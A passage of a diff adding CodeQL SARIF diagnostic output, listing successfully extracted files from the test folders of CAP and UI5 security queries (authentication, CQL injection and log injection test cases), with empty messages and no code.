"uriBaseId" : "%SRCROOT%", + "index" : 64 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 65 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 66 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 67 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 68 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 69 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 70 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 71 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 72 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 73 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 74 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 75 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 76 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 77 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 78 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 79 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 80 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 81 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 82 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 83 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 84 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 85 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 86 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 87 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 88 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 89 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 90 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 91 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 92 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 93 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 94 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 95 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 96 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 97 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 98 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 99 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 100 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 101 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 102 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 104 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 105 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 107 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 108 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 109 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 110 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 111 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 112 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 113 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 115 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/lib/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 116 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/lib/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 117 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/src/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 118 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/src/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 119 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 120 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/lib/BindingStringParser/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 121 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 123 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.html", + "uriBaseId" : "%SRCROOT%", + "index" : 124 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : 